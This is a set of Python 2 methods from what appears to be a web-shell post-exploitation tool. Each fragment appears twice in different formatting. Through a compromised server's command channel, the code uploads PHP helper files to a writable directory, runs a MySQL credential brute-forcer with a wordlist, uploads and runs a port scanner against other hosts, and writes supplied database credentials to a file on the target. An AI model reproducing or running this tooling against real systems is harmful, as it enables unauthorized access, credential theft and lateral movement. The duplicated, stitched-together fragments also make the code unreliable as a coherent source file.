def upload(self, command):
if len(command) != 3:
cprint('\n[!] Usage: @upload [local_file_path] [remote_file_path]', 'red')
else:
lfile_path = command[1]
rfile_path = command[2]
file_handler.upload_file(lfile_path, rfile_path)
def __init__(self, host, username, password):
cprint("\n[+] Please type 'exit' when your done to remove the files uploaded on the server")
self.host = host
self.username = username
self.password = password
self.hostDir = linux.get_writble_dir()
if not self.hostDir:
cprint("'\n[+] Unable to locate a writeble directory on the server")
cprint("\n[+]MySQL module can't be used. Exiting now!")
else:
self.phpFile = [self.hostDir + "/mysql.php", self.hostDir + "/auth.php"]
cprint('\n[+] Uploading PHP files...', 'green')
for i in self.phpFile:
file_handler.upload_file('modules/services/{0}'.format(i.split('/')[-1]), i)
cmd = 'echo "%s,%s,%s" > %s/auth.txt' % (self.username, self.password, self.host, self.hostDir)
cprint('\n[+] Authenticating with the server...', 'blue')
make_request.get_page_source(cmd)
cmd = "cd {0}; php {1}".format(self.hostDir, 'auth.php')
res = make_request.get_page_source(cmd)
if 'failure' in res:
cprint("\n[+] Access denied for user '{0}'@'{1}'".format(self.username, self.host), 'red')
self.authorized = False
self.clean()
else:
cprint("\n[+]Login Successful", 'green')
self.authorized = True
def upload(self, command):
if len(command) != 3:
cprint('\n[!] Usage: @upload [local_file_path] [remote_file_path]',
'red')
else:
lfile_path = command[1]
rfile_path = command[2]
file_handler.upload_file(lfile_path, rfile_path)
def scan_host(self, host, range):
folder = linux.get_writble_dir()
if folder:
cprint('[+] Uploading scanner to the box ...', 'green')
scanner = folder + '/webhandler_scanner.php'
file_handler.upload_file('modules/scanners/port.php', scanner)
cmd = 'cd {0}; php {1} {2} {3}'.format(folder, scanner, host, range)
cprint('\n[+] Scanning the target ...', 'green')
cprint('----------------------------')
try:
output = make_request.get_page_source(cmd)
if output:
print ""
for line in output:
cprint(line, 'white')
else:
cprint('\n[+] Didn\'t find any open ports match the range "{0}"'.format(range), 'red')
file_handler.clean(scanner)
except KeyboardInterrupt:
file_handler.clean(scanner)
def mysql(self):
folder = linux.get_writble_dir()
if folder:
self.bruter_file = folder + "/mysql.php"
self.wordlist = folder + "/wordlist.txt"
cprint("\n[+] Uploading the bruter/wordlist ...", "green")
file_handler.upload_file("modules/bruters/mysql_bruter.php", self.bruter_file)
file_handler.upload_file("modules/bruters/wordlist.txt", self.wordlist)
cmd = "cd {0}; php {1}".format(folder, self.bruter_file)
cprint("\n[+] Brute-Forcing MySql Creds ...", "green")
try:
creds = make_request.get_page_source(cmd)
creds = "".join(creds).split(":")
if creds[0] == "success":
username = colored(creds[1], "blue")
password = colored(creds[2], "blue")
print "[+] MySql Creds Username: {0} Password: {1}".format(username, password)
else:
cprint("[!] Couldn't brute-force MySql credentials", "red")
self.clean()
except KeyboardInterrupt:
self.clean()
def mysql(self):
folder = linux.get_writble_dir()
if folder:
self.bruter_file = folder + '/mysql.php'
self.wordlist = folder + '/wordlist.txt'
cprint('\n[+] Uploading the bruter/wordlist ...', 'green')
file_handler.upload_file('modules/bruters/mysql_bruter.php', self.bruter_file)
file_handler.upload_file('modules/bruters/wordlist.txt', self.wordlist)
cmd = 'cd {0}; php {1}'.format(folder, self.bruter_file)
cprint('\n[+] Brute-Forcing MySql Creds ...', 'green')
try:
creds = make_request.get_page_source(cmd)
creds = ''.join(creds).split(':')
if creds[0] == 'success':
username = colored(creds[1], 'blue')
password = colored(creds[2], 'blue')
print '[+] MySql Creds Username: {0} Password: {1}'.format(username, password)
else:
cprint('[!] Couldn\'t brute-force MySql credentials', 'red')
self.clean()
except KeyboardInterrupt:
self.clean()
def __init__(self, host, username, password):
cprint(
"\n[+] Please type 'exit' when your done to remove the files uploaded on the server"
)
self.host = host
self.username = username
self.password = password
self.hostDir = linux.get_writble_dir()
if not self.hostDir:
cprint(
"'\n[+] Unable to locate a writeble directory on the server")
cprint("\n[+]MySQL module can't be used. Exiting now!")
else:
self.phpFile = [
self.hostDir + "/mysql.php", self.hostDir + "/auth.php"
]
cprint('\n[+] Uploading PHP files...', 'green')
for i in self.phpFile:
file_handler.upload_file(
'modules/services/{0}'.format(i.split('/')[-1]), i)
cmd = 'echo "%s,%s,%s" > %s/auth.txt' % (
self.username, self.password, self.host, self.hostDir)
cprint('\n[+] Authenticating with the server...', 'blue')
make_request.get_page_source(cmd)
cmd = "cd {0}; php {1}".format(self.hostDir, 'auth.php')
res = make_request.get_page_source(cmd)
if 'failure' in res:
cprint(
"\n[+] Access denied for user '{0}'@'{1}'".format(
self.username, self.host), 'red')
self.authorized = False
self.clean()
else:
cprint("\n[+]Login Successful", 'green')
self.authorized = True
def scan_host(self, host, range):
folder = linux.get_writble_dir()
if folder:
cprint('[+] Uploading scanner to the box ...', 'green')
scanner = folder + '/webhandler_scanner.php'
file_handler.upload_file('modules/scanners/port.php', scanner)
cmd = 'cd {0}; php {1} {2} {3}'.format(folder, scanner, host,
range)
cprint('\n[+] Scanning the target ...', 'green')
cprint('----------------------------')
try:
output = make_request.get_page_source(cmd)
if output:
print ""
for line in output:
cprint(line, 'white')
else:
cprint(
'\n[+] Didn\'t find any open ports match the range "{0}"'
.format(range), 'red')
file_handler.clean(scanner)
except KeyboardInterrupt:
file_handler.clean(scanner)
